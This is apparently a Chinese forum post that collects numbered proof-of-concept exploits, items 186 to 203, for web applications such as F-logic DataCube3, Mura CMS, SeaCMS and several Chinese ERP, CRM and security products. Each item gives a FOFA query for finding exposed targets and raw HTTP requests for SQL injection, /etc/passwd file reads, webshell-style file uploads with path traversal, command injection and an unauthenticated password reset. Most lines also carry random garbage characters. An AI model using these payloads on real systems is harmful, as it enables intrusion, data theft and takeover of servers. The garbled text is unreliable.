/ s w* X5 o( @- Y c1 ^7 s$ o' X" X# C2 N" G
186. F-logic DataCube3 SQL注入# u5 b8 |/ D# z! f8 B5 z
CVE-2024-31750, U p* L" B3 b) f
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
, T8 s4 d. Z+ ?FOFA:title=="DataCube3"
~5 F; T, S; k5 gPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1) m# Q7 Y& E0 i6 }1 j
Host: your-ip5 S/ ]8 h! {# @, y" T, ?* p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0$ ?. a% O% Z+ U& E. c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
5 X' g/ C* M1 cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 T" L/ `1 ^4 g0 z% c' q
Accept-Encoding: gzip, deflate$ m8 [7 V: D5 T- x
Connection: close
3 z u2 S. _5 d1 X1 n' M' cContent-Type: application/x-www-form-urlencoded
: ?9 A9 M- F& \/ P) E4 N( t- e
# L" u( z/ a8 i5 d* }! r) E+ y* Areq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450! z( v, k0 E9 ?6 T9 p9 j
4 z" Y' x+ c" y$ s% x3 x" u; @
]0 z9 i# M/ t0 e5 ^1 W/ d187. Mura CMS processAsyncObject SQL注入% J, {# u( |: Y' A& _
CVE-2024-326409 L( e4 ]# f1 U
FOFA:"Mura CMS"+ t, M6 A3 R0 e3 ^ ?
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
& R% s9 X3 A/ X7 a0 }. w8 UHost: your-ip
a) E3 q7 g# m$ d5 QContent-Type: application/x-www-form-urlencoded: x- g2 ]% H; W1 p7 X9 o [
- Q9 Z; Z2 g# Z( y6 w
7 e8 q. Z# ^( c) |! V) pobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
* [2 D2 o7 B& W8 u j$ S
4 P) C- \2 @9 C4 C* S1 D G3 L. z) @5 _) t
188. 叁体-佳会视频会议 attachment 任意文件读取
6 E4 j; E3 [/ cversion <= 3.9.7- e. y- ?# c8 F. [$ W+ C# g/ Y
FOFA:body="/system/get_rtc_user_defined_info?site_id"
; Y2 J, ^4 h2 M% pGET /attachment?file=/etc/passwd HTTP/1.1" ]$ l: d! }8 j6 f
Host: your-ip
% P* n: M- z$ M8 @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.368 t; j; {. ^6 u# T) v+ v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" t* e, g( d( }4 z
Accept-Encoding: gzip, deflate! D( Z$ S3 ~0 e! B1 N2 y. ~% {
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
% A( d& H- ^3 P# p) PConnection: close, F( p0 C! [9 b0 G
7 @! \7 C/ d, i' z* Z3 I2 l
( ?3 [/ D4 X( m2 v
189. 蓝网科技临床浏览系统 deleteStudy SQL注入- V; b' j. g+ j2 G
FOFA:app="LANWON-临床浏览系统"* I2 l$ u! ?2 Z& B3 U" n
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1) t- e/ M# s: U2 K- p
Host: your-ip
9 `7 |/ N7 v' r- WUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
' w# \4 t ~2 {1 @) d4 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 r0 i0 y5 {' w- JAccept-Encoding: gzip, deflate
" f0 j" L1 N3 v* b7 _Accept-Language: zh-CN,zh;q=0.9) U6 ~ n* S5 ]/ L2 d
Connection: close
6 J9 D: g! k+ H+ W+ {" ?0 ^
& I2 {6 Y N4 O# y3 N; \3 `7 ?% w0 R7 y+ x
190. 短视频矩阵营销系统 poihuoqu 任意文件读取) \/ W2 N3 g0 P. a# C
FOFA:title=="短视频矩阵营销系统"
4 B# q+ i* l1 P$ i5 q1 x1 c1 m% EPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
5 c: Q* C3 K% s( t8 b1 _Host: your-ip2 V; q8 J9 E A0 ]6 H3 }2 d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
2 z6 [. Q; ~. G- H9 ~) m/ g8 h1 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
/ W# N8 c8 V; @9 W' L j# ^8 |' XContent-Type: application/x-www-form-urlencoded
- z' r% S4 u! L: @/ AAccept-Encoding: gzip, deflate/ ?; C) V, `0 p2 r
Accept-Language: zh-CN,zh;q=0.9
3 Z$ L V3 I; ^* X
3 F$ W4 h& s4 {6 Z' L5 F% dpoi=file:///etc/passwd9 a: \+ D: x8 w& b( E. ~# ^( E7 J
; t, Q( [* t$ ?0 N; x. E2 E" E
7 u8 s8 a( `8 A" A" J
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
/ d" l2 M/ a# H1 G+ v! s! gFOFA:body="/CDGServer3/index.jsp"
$ e" E/ |! g0 Q" U5 Z: LPOST /CDGServer3/js/../NavigationAjax HTTP/1.1
, k5 k* X8 K/ d6 |0 kHost: your-ip3 \/ M: A7 h/ T, D! q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; l9 \& T0 i2 S/ K9 p2 s5 BContent-Type: application/x-www-form-urlencoded
, H5 L& v( l R& O% M& i( E1 Z7 B" H7 T* W8 z W9 f8 j
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
: E! L$ K: J' \$ G* b) Z( c; @
" N4 n; O* p* @8 y4 {- O. Y) x$ Z# J8 C9 l
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传4 o8 y# d" G; |$ n+ ^
FOFA:title="用户登录_富通天下外贸ERP"
8 Z S2 r# A, }( c; n' DPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
: J4 _* {* {, f: h$ ^ bHost: your-ip5 U# H& Q. _# g* `3 X5 |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.360 H, \. Z% k) F6 [
Content-Type: application/x-www-form-urlencoded
* q- a( \/ l* p* u+ }8 h# c8 F5 v2 `& |2 l9 c+ Z4 v0 a
/ ] T; N( U* Y& I! b: R
<% @ webhandler language="C#" class="AverageHandler" %>
2 \. b9 C, i& lusing System;
$ A9 C6 `$ U: `4 W- yusing System.Web;
1 X, Q* N0 v/ a/ `7 Gpublic class AverageHandler : IHttpHandler
7 A& P! C A$ _1 p: h- C- }4 [{
1 ?% ]+ D! Z6 V3 a+ f. w& v( Gpublic bool IsReusable
- U1 Q3 h) c7 e, W- {{ get { return true; } }+ {; v( w, D& |7 ?
public void ProcessRequest(HttpContext ctx)
+ o! s& [( y. Y' r' F. l{
+ @5 {" }2 J1 C$ k3 t6 Pctx.Response.Write("test");
/ I3 I6 B1 d# v3 M* ?* ?5 ?8 D}
) i% c4 b3 i$ E! ^" ~; M. }: \) I2 \}2 X3 j4 ~& w: v
6 L O3 K. H1 k9 G
, d' `4 Q. K0 X( l
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行% |4 U( R8 x$ ^" V& _2 ~% U
FOFA:body="山石云鉴主机安全管理系统"
* P8 U# F) K+ V `- `! }) T$ BGET /master/ajaxActions/getTokenAction.php HTTP/1.1$ ]& X8 \9 ^& Z% h. o: R
Host:
0 j- G& {1 L( K! t1 y! QCookie: PHPSESSID=2333333333333; C/ E: \' J# v: t! t
Content-Type: application/x-www-form-urlencoded& g1 e6 d' x" f: I" k
User-Agent: Mozilla/5.0: P. k+ q9 I$ x$ t
) R: \! h% T4 ~" P+ d3 [2 j h
" ?2 B. D: Q* L) T! H0 z" O" iPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1& f5 \: @: C0 c. z* q
Host:
1 H. O+ K0 i P: k, r# u9 kUser-Agent: Mozilla/5.0
! [1 q6 k% y+ L* Z5 zAccept-Encoding: gzip, deflate+ h2 v/ v: a; W- g# e
Accept: */*
8 g2 _4 A) ?) E" t; ^Connection: close: P3 `. a8 [" `/ T8 W% r
Cookie: PHPSESSID=2333333333333;
H4 f: r9 O: C _8 U" h% KContent-Type: application/x-www-form-urlencoded
) f3 l" s) z" R, Q. ]Content-Length: 845 P& a, C6 r" Q
/ L9 q) u" F7 s4 f9 Eparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
/ l$ p* y& B' r: C3 q
- \0 S z7 F1 {1 U
- K# z9 i( E# V+ k* LGET /master/img/config HTTP/1.1
# |0 C3 ^+ \) K, l: A# P, vHost:
- U- H) F. i. U" UUser-Agent: Mozilla/5.0
2 c! r' N9 K8 t- ]3 M0 w* ~0 D
4 D) b( Y( `$ L' ]: t. _6 @1 D9 h) `! s$ R" \
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
. k5 n* R; P2 R9 b1 b4 M) d0 JFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
" ^7 c& O( i" j4 S+ x1 v+ A! T
) H1 O* N) V! ], m* ~POST /servlet/uploadAttachmentServlet HTTP/1.1' d, h9 X7 n& t# A
Host: host
* h% P$ `+ Z0 u8 ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36& F4 v* J6 X: A& E6 H0 U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& L j0 h% _/ P j5 S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, J/ R! g8 R- g# r3 a& HAccept-Encoding: gzip, deflate
% J r$ d9 [% ]" s5 Q: H& `Connection: close3 ~8 ]/ D9 a3 G9 O' @
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
: m8 {. l, a' i1 i$ B( }! R------WebKitFormBoundaryKNt0t4vBe8cX9rZk
+ K6 e' k3 L- }- ]+ P2 I* l3 ~+ n! {, z1 w3 v {! }0 D& s
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"# o( L* E" D. W, p
Content-Type: text/plain9 D1 P P9 S' s1 Y. U
<% out.println("hello");%>. l5 U+ u$ Q- j2 g+ r, G
------WebKitFormBoundaryKNt0t4vBe8cX9rZk) H, K; b3 a$ `$ C) \
Content-Disposition: form-data; name="json"
# F; B& u+ c7 h; }8 ]- D# n {"iq":{"query":{"UpdateType":"mail"}}}
. ~& I0 k! K/ J& {# n8 N2 v4 N------WebKitFormBoundaryKNt0t4vBe8cX9rZk--5 K b9 Q: `, k
' A% a, @2 {7 O/ X6 h; p4 |# Y, Z" b% n) w+ ?5 c" @. E% `
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行6 |8 W( `$ q. N9 [$ z# _
FOFA:title=="飞鱼星企业级智能上网行为管理系统
3 L9 U. l# D4 Q# ^0 P/ S9 q$ ]POST /send_order.cgi?parameter=operation HTTP/1.1
` ]/ e1 J' G6 q1 }Host: 127.0.0.1. {1 O4 y W/ r
Pragma: no-cache# I$ W* Y5 U; d
Cache-Control: no-cache6 C- D; Y$ e3 G6 ]9 h9 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
5 V+ b% i+ ]0 O$ jAccept: */*7 d3 g- C5 |+ v
Accept-Encoding: gzip, deflate
( x, G, S. ]) b4 ?" _Accept-Language: zh-CN,zh;q=0.9
$ @" ?* i3 r7 FConnection: close7 j$ k8 ^ l3 ?, i$ m* L; A$ x: `
Content-Type: application/x-www-form-urlencoded
- O/ M* _" W. K! J# u9 H. J, o; UContent-Length: 689 \ A9 A# B# x
3 `& e( j _9 p6 O9 L
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}2 i7 b5 m Z; K; _3 N9 g
0 _ D+ r% f+ l
9 `. Q, [- j; p: ^* R196. 河南省风速科技统一认证平台密码重置
- m9 E" x- A M, iFOFA:body="/cas/themes/zbvc/js/jquery.min.js"% k! [7 K ?2 q
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1: I0 W0 N/ d( O: Z6 U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.361 z/ C! _* N/ D. d' N- B. A0 R
Content-Type: application/json;charset=UTF-8- ^. Z2 \" S9 [- I2 \9 i. d
X-Requested-With: XMLHttpRequest
4 M% g6 M4 u" `; t7 n8 R: a; N! sHost:/ ?3 c% l8 Z3 a, K+ W! z
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
" h/ u* \! |8 ~# C9 B$ VContent-Length: 45
. [7 S# |" Q$ b$ U/ P. A; }Connection: close& S- v0 ?& }# w1 \: M( h4 z4 z
% B5 S4 |" c6 A; P+ z* v; }{"xgh":"test","newPass":"test666","email":""}
; p5 D. Z1 W2 X1 h n1 J* y y
5 D/ V8 x- @( ?/ w- z3 C- R! [: g" t( s! W! h- y+ ?$ y
( u9 `# Y1 r9 i& b2 B* B* q197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
5 m" J. x; \& a. X% v4 AFOFA:app="浙大恩特客户资源管理系统", S' f3 u3 x9 P7 Z/ Q: [
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.14 b( T8 J" l U7 S1 ^+ S, X5 `, f
Host:; x# G- Y, i, {9 X7 e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36/ |' B! |- G1 K; u
Accept-Encoding: gzip, deflate h( l- P6 e1 E
Connection: close! X) I% h5 z1 P8 ~
" m8 s& s1 \$ y$ h% q
$ F$ S8 B3 V5 M. d- N
; v% z1 `, u9 h( T( a6 H" N198. 阿里云盘 WebDAV 命令注入/ s6 z3 Y c3 y; e: `- D1 O
CVE-2024-29640
, D& Z$ n! t2 y3 b0 G) {GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
3 |/ {! l+ k* o/ ~Cookie: sysauth=41273cb2cffef0bb5d0653592624cf641 _% K+ i% W* V! x5 Z
Accept: */*
. ~+ H O A( ~4 n( u% g- gAccept-Encoding: gzip, deflate# u# I8 R& W2 x
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
8 o* e5 V9 T. K; f/ i/ Y8 wConnection: close
. V( \; n$ S0 A& H/ ~5 |7 ]2 @- y% Q2 n+ g1 _4 e: J
; K T: [) Z/ P/ q9 C- n
199. cockpit系统assetsmanager_upload接口 文件上传
1 r) h4 p* C- Z! R4 k C& }7 V. Y8 s5 g! \- K
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:2 ~! T* V! T+ {5 L) r0 p
GET /auth/login?to=/ HTTP/1.1
5 Q# w6 n1 c$ s6 }7 N# P) G/ ~- {) r4 l8 w" ?" C4 a1 f
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
4 F5 Z5 I+ x b+ o& a0 L" n' V' i* {* }% {" o6 [4 r7 F
2.使用刚才上一步获取到的jwt获取cookie:
. V( Q. J. ^* @9 I" d! i5 h% c# _% D3 I: U4 K0 b% P
POST /auth/check HTTP/1.19 O$ d4 \% H F( h& ^
Content-Type: application/json
; |) ^* l. e3 N5 z7 x$ f0 t, P( C( V) V, B& G: a
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}. O+ ]% x, t3 k! O
9 R3 H; G5 e) X9 T7 m8 e% \1 q响应:200,返回值:2 s. E7 x( R0 |5 o% O/ P
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/; [' ~; u ~* i. v U% K0 O
Fofa:title="Authenticate Please!"
7 X: A+ [+ S5 t7 sPOST /assetsmanager/upload HTTP/1.15 T+ a% e( S8 x: h: R [2 b
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3* v6 C$ g8 g5 ]1 D& [2 P
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92- F/ i5 L# ?( ~! j- C
0 N' [+ E, [% t# m; C$ T1 A* t
-----------------------------36D28FBc36bd6feE7Fb3; q2 I$ M8 _( t& Q; B3 \7 A( e5 h
Content-Disposition: form-data; name="files[]"; filename="tttt.php"4 _6 f9 E& l9 ?" _8 B* g/ L% w
Content-Type: text/php
; Y3 C% f. K' Z E
* K/ Y. l! M: c# c4 c<?php echo "tttt";unlink(__FILE__);?>
7 h8 o9 P2 V/ x# l4 Z-----------------------------36D28FBc36bd6feE7Fb3
0 _: I0 U6 q7 G9 R2 jContent-Disposition: form-data; name="folder"! [$ T2 ~4 h" `8 v. [
+ G1 B& ]- ^! |5 k' o# f, _/ A-----------------------------36D28FBc36bd6feE7Fb3--
7 z" @" i9 Q/ D- l$ N/ ]0 d4 E9 N( q( e: C2 V0 R5 U. Z. m
2 N! s: K1 E, H1 W/storage/uploads/tttt.php
: g1 L: S$ d9 v; ~0 w7 X* y, x9 h0 R* }( h! t3 s' M
200. SeaCMS海洋影视管理系统dmku SQL注入: u7 v f, @4 c& q' t! H& D7 |( Q
FOFA:app="海洋CMS"
' \# T( l8 R; A$ X5 h6 pGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1! o7 Y/ B a2 _; b
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
4 }! y% [# Y/ aUpgrade-Insecure-Requests: 1
" ] x' T! _" w. k" C% tCache-Control: max-age=0& \! b8 u: m1 x9 V4 |( O' n! E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ ^9 ]! [8 ?# ^, g! i: J7 \Accept-Encoding: gzip, deflate
" E& C& x- z, R, YAccept-Language: zh-CN,zh;q=0.9
8 E i1 s; e1 w9 ?2 U0 w) F, I/ y
) C! t# V: s6 Y: K201. 方正全媒体新闻采编系统 binary SQL注入
; \* ~. M' j3 l# D, X" ~FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"6 A4 t$ T( `. I9 O$ R
POST /newsedit/newsplan/task/binary.do HTTP/1.15 y( ^" z$ }( v4 r
Content-Type: application/x-www-form-urlencoded, L$ z. u$ j' t9 Q: M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 N; t" W' W, Z) C# a& B9 S) E$ C% Z3 LAccept-Encoding: gzip, deflate6 r4 x8 z$ Q |1 }0 V0 n# V5 `
Accept-Language: zh-CN,zh;q=0.9) E3 F0 ^, U; M2 u$ `
Connection: close! u5 Y1 F* ~: I f
; k, T" L9 B0 u* [) G; J/ ZTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=12 ]7 X0 ]6 s- Q
/ f: p) J+ y5 L+ h, h L
6 M/ N+ o: J& T$ U# G" h202. 微擎系统 AccountEdit任意文件上传
" Z0 ~6 T" A+ z6 H! }4 |FOFA:body="/Widgets/WidgetCollection/" m4 l. k& o" l5 G
获取__VIEWSTATE和__EVENTVALIDATION值 X4 L, g/ \+ u6 j. d. y6 w
GET /User/AccountEdit.aspx HTTP/1.13 F, }4 X# L, k! {$ g5 A% r
Host: 滑板人之家
$ G+ q( l1 ?! S; e: {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31/ J3 K. J' |, e& p& I# Z3 C4 R
Content-Length: 02 n; e% `" q, V' d a3 x. Y
5 {9 b3 q: W) O1 X
9 y+ G; t5 b* M% r7 P* y8 x# m替换__VIEWSTATE和__EVENTVALIDATION值
1 i9 T" v/ v+ C6 e8 ~POST /User/AccountEdit.aspx HTTP/1.1
2 u* f% y8 d9 h/ m* Z$ O qAccept-Encoding: gzip, deflate, br
9 I, s( U" a( b0 k0 @2 QContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
; W4 I0 v2 N. Q- v1 A% h
5 p1 z. C( F& W# l7 u. t( N& H# P-----------------------------786435874t38587593865736587346567358735687+ W& p* Y. p( ?& k! D2 T
Content-Disposition: form-data; name="__VIEWSTATE"
2 b. y- [2 j1 I7 Q& P8 F+ h) p0 r8 b J3 F9 q" l; B! ?
__VIEWSTATE7 l, O, b3 Q9 i6 ]1 o; u, R! _! ?+ x
-----------------------------786435874t38587593865736587346567358735687# [5 _( m0 i, o- G' m+ g
Content-Disposition: form-data; name="__EVENTVALIDATION"
6 A, ^4 D6 ]( g/ j3 S9 Z9 h) Y/ a$ _
, x: U' ~0 j7 k; {& ]__EVENTVALIDATION$ M/ @% N+ x! M* Z& J/ H
-----------------------------786435874t38587593865736587346567358735687
+ U k: l" G E/ z8 k* DContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"2 S! [# r9 |8 D# `, ^* O) _. D5 l$ y
Content-Type: text/plain$ P" u8 h; f3 E# ?+ C7 ]# c X/ V
7 Z+ H2 C, u$ j, s( s& @6 L# A& ^
Hello World!
$ d7 g+ _$ p' m" w-----------------------------786435874t38587593865736587346567358735687) w+ \8 [# l4 N& V# I; a( H
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
6 t: V o5 x% Z4 V- ~3 n
& E4 _8 V3 t* D. B& _$ _/ d3 B {* }上传图片
3 d4 S: ?1 I! c) A) H# a7 G-----------------------------786435874t38587593865736587346567358735687) H0 l$ C. d4 H7 d4 u) |, }8 b
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
l/ A) C7 I6 y: V& U! L0 K. B& _" ?" s
9 \5 h5 f/ k3 A. `1 ^( B8 k
" ^* }9 a( ]4 p1 u E' s* F-----------------------------786435874t38587593865736587346567358735687
* M- Z( o6 v" TContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
9 z" o: [1 K) z& R1 u( }, x8 y. c/ x* R
& O" h2 v+ ]+ D, W
-----------------------------786435874t38587593865736587346567358735687--
' k2 L) K% R! N/ {& Q0 K9 B
/ I) @/ V a$ v N' a$ F3 h _8 f r* M* |+ M* y
/_data/Uploads/1123.txt
* I: ~* A& B2 ]9 q6 @% a; V7 {* _! a* e% \) k5 m" ]0 n
203. 红海云EHR PtFjk 文件上传2 a7 N( j3 v$ |' A+ @7 p
FOFA:body="RedseaPlatform"* E. X5 O8 G# h& n7 L
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.10 {1 p% K% L. p* g! o8 ^
Host: x.x.x.x
, ? x$ E* L2 ^( LAccept-Encoding: gzip
, f6 D4 I4 V* n6 m4 a! GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ w: |/ T) F- j: _Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
1 q4 a; @- g& W" ?" ~4 AContent-Length: 210
% v7 _6 z# S. E% w) E+ H9 }2 L* r& n7 I+ u( s2 G
------WebKitFormBoundaryt7WbDl1tXogoZys4
5 ?3 X+ I* G) l. \Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
% G; P" i( u8 ?$ {/ R7 D5 E* T! B+ bContent-Type:image/jpeg
: K q5 G! S8 S" S
- t* {% |7 \! [9 p( T# g<% out.print("hello,eHR");%>
7 k7 |! z" D6 Z) v& c' i: I) W: O------WebKitFormBoundaryt7WbDl1tXogoZys4--
( s5 k% M9 }0 E. U) @% m' j2 A7 |4 w1 ~* |( ]9 p
1 u6 H8 o8 `3 E3 ~( U6 A8 }- B; F. s4 G8 R
+ F2 x4 M, A- d$ k
- p& U* `4 h; C. H7 E4 s V
$ x) j* P1 o0 E& s |
发表于 2024-6-5 14:31:29